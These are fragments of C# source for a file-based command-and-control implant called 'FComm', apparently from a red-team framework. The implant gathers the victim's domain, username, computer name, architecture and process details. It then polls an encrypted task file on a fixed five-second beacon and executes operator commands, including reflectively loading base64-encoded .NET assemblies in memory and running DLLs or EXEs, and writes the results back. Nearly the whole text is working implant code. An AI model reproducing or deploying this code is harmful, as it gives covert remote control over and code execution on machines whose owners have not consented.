private void SendData(FCDataGram DataToSend) { //Turn object into a string. //encrypt it //write it. SafeFileWrite(Encrypt(Key, DataToSend.ToString())); }
public void Tasking(string input) { FCDataGram Task = new FCDataGram() { PacketType = "TASK", Input = input, Output = "", Actioned = false }; }
public FCClient(string FilePath_In, string HostInfo, string key) { //initialise object. try { FilePath = FilePath_In; Key = key; string path = Path.GetDirectoryName(FilePath_In); string filename = Path.GetFileName(FilePath_In); Directory.CreateDirectory(path); //Create the full path if it doesn't exist. var f = File.Create(FilePath_In); //create the file if it doesn't exist. Probably worth putting more sanity checks here. f.Close(); f.Dispose(); //lets populate it with the info we need. FCDataGram InitialContent = new FCDataGram() { PacketType = "INIT", Input = Convert.ToBase64String(Encoding.UTF8.GetBytes("initial")), Output = Convert.ToBase64String(Encoding.UTF8.GetBytes(HostInfo)), Actioned = true }; SendData(InitialContent); } catch (SecurityException e) { Console.WriteLine(e.Message); } catch (Exception e) { Console.WriteLine(e.Message); } }
private static void FCommConnect() { //initialise the implant. if (initialised == false) { string u = ""; try { u = WindowsIdentity.GetCurrent().Name; } catch { u = Environment.UserName; } if (ihInteg()) { u += "*"; } string dn = Environment.UserDomainName; string cn = Environment.GetEnvironmentVariable("COMPUTERNAME"); string arch = Environment.GetEnvironmentVariable("PROCESSOR_ARCHITECTURE"); int pid = Process.GetCurrentProcess().Id; var procname = Process.GetCurrentProcess().ProcessName; Environment.CurrentDirectory = Environment.GetEnvironmentVariable("windir"); string hostinfo = String.Format("FComm-Connected: {0};{1};{2};{3};{4};{5};", dn, u, cn, arch, pid, procname); FComm = new FCClient(filename, hostinfo, encryption); initialised = true; } try { running = true; while (running) { if (initialised == true) { var output = new StringBuilder(); //DANGER: Removing this could end up absolutely spanking the CPU, this is effectively Beacon Time for the implant. Thread.Sleep(5000); //fixed beacon time. FCDataGram Task = FComm.GetCurrentTasking(); if (Task == null) { //Nothing to do. continue; } if (Task.Actioned == true) { //The task in the file has been actioned already. continue; } //Base64 decode required here. var cmd = Encoding.UTF8.GetString(Convert.FromBase64String(Task.Input)); var sOutput2 = new StringWriter(); //Setup stringwriter to buffer output from command. if (cmd.ToLower().StartsWith("kill-implant")) { running = false; initialised = false; sOutput2.WriteLine("[!] Killed Implant."); FComm.CleanUp(); FComm = null; } else if (cmd.ToLower().StartsWith("loadmodule")) { try { var module = Regex.Replace(cmd, "loadmodule", "", RegexOptions.IgnoreCase); var assembly = Assembly.Load(Convert.FromBase64String(module)); } catch (Exception e) { sOutput2.WriteLine($"Error loading modules {e}"); } sOutput2.WriteLine("Module loaded successfully"); } else if (cmd.ToLower().StartsWith("run-dll-background") || cmd.ToLower().StartsWith("run-exe-background")) { sOutput2.WriteLine("[!] This is not implemented yet in FComm implant types."); //This might not work!? Need to consider how to approach this. /* * Thread t = new Thread(() => RunAssembly(cmd, true)); * t.Start(); * sOutput2.WriteLine("[+] Running task in background, run get-bg to get background output."); * sOutput2.WriteLine("[*] Only run one task in the background at a time per implant."); */ } else if (cmd.ToLower().StartsWith("run-dll") || cmd.ToLower().StartsWith("run-exe")) { var oldOutput = Console.Out; //redirecting output Console.SetOut(sOutput2); sOutput2.WriteLine(RunAssembly((cmd))); Console.SetOut(oldOutput); //redirecting it back. } else if (cmd.ToLower() == "foo") { sOutput2.WriteLine("bar"); } else if (cmd.ToLower() == "get-bg") { //Removing this as Rob says this should just work, but it's not been properly tested yet. sOutput2.WriteLine("[!] This is not implemented yet in FComm implant types."); /* * var backgroundTaskOutputString = backgroundTaskOutput.ToString(); * if (!string.IsNullOrEmpty(backgroundTaskOutputString)) * { * output.Append(backgroundTaskOutputString); //check later. * } * else * { * sOutput2.WriteLine("[-] No output"); * }*/ } else { var oldOutput = Console.Out; Console.SetOut(sOutput2); sOutput2.WriteLine(RunAssembly($"run-exe Core.Program Core {cmd}")); Console.SetOut(oldOutput); } output.Append(sOutput2.ToString()); Task.Output = Convert.ToBase64String(Encoding.UTF8.GetBytes(output.ToString())); Task.Actioned = true; FComm.UpdateTask(Task); output.Clear(); output.Length = 0; sOutput2.Flush(); sOutput2.Close(); } } } catch (Exception e) { Console.WriteLine("Error: " + e.Message); Console.WriteLine(e.StackTrace); } }
public void UpdateTask(FCDataGram Task) { //Just to make the methods seem sensible. SendData(Task); }